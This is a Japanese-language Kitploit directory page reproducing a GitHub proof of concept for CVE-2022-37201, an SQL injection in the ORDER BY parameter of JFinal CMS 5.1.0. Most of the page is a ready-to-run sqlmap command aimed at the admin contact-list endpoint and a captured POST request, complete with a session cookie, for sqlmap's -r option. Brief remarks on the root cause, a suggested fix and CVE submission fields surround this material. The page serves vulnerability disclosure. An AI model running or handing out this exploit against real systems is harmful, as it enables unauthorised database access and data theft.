Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2022-37201 — CVE-2022-37201 POC | Kitploit
ツール/GitHubGitHub/againstthelight/cve-2022-37201
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト
GitHubagainstthelight/cve-2022-37201

CVE-2022-37201

CVE-2022-37201 POC

リポジトリを見る
3年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2022-37201

CVE-2022-37201 POC

POC

まず、sqlmapをインストールする必要があります。

設定が必要です:

  • 対象のドメインまたはIP
  • あなたのクッキー

その後、シェルを実行します。

root@kitploit:~
sqlmap -u http://targetDomainOrIP/jfinal_cms/jfinal_cms/admin/contact/list  --thread 8 --batch --smart  --random-agent --data "
form.orderColumn=*&form.orderAsc=&attr.name=%E4%B8%89&totalRecords=2&pageNo=1&pageSize=20&length=10"  --cookie "  your cookie  " --current-db

image-20220730053527316

場合によっては、/jfinal_cms/ が必須ではないことを知っておく必要があります。ルートを判断する必要があります。

原理

インターフェース /system/menu/list のコードを見ることができます。

root@kitploit:~
sql.append(" order by ").append(orderBy);

SQL文が直接結合されています。

さらに、ここではSQLインジェクションが必要とされるため、それを防ぐ対策はありません。

解決策

この機能ポイントを分析したところ、orderbyのインジェクションは固定されており、例えばid、name、menuキーなどがあります。したがって、パラメータ化クエリを使用するか、ホワイトリストを作成することを試みることができます。

さらに

私のテスト

root@kitploit:~
POST /jfinal_cms/admin/contact/list HTTP/1.1
Host: 172.30.48.1
Content-Length: 98
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://172.30.48.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://172.30.48.1/jfinal_cms/admin/contact/list
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=BF13B42EDFC3DEC180959D6DF143BD18; Hm_lvt_1040d081eea13b44d84a4af639640d51=1659122360; session_user="wgPmpe3hEuJWIL+I+kHtxqag1wutWsMhm6eaAgoJH0c="
Connection: close

form.orderColumn=*&form.orderAsc=&attr.name=%E4%B8%89&totalRecords=2&pageNo=1&pageSize=20&length=10

sqlmapで実行してください!!! -rオプションを使用します。

[提案された説明] JFinal CMS 5.1.0はSQLインジェクションに対して脆弱です。


[追加情報] https://github.com/AgainstTheLight/someEXP_of_jfinal_cms/blob/main/jfinal_cms/sql4.md


[脆弱性タイプ] SQLインジェクション


[製品ベンダー] 開発グループ


[影響を受ける製品コードベース] https://github.com/jflyfox/jfinal_cms - JFinal CMS 5.1.0


[影響を受けるコンポーネント] これらのインターフェースは同じコンポーネントを使用しておらず、フィルターもありませんが、それぞれが独自のSQL連結方法を使用しており、SQLインジェクションが発生します。


[攻撃タイプ] リモート


[影響:コード実行] true


[影響:情報漏洩] true


[攻撃ベクトル] ユーザーログインが必要です


[リファレンス] https://github.com/AgainstTheLight/someEXP_of_jfinal_cms/blob/main/jfinal_cms/sql4.md


[発見者] jw5t

ツールをダウンロード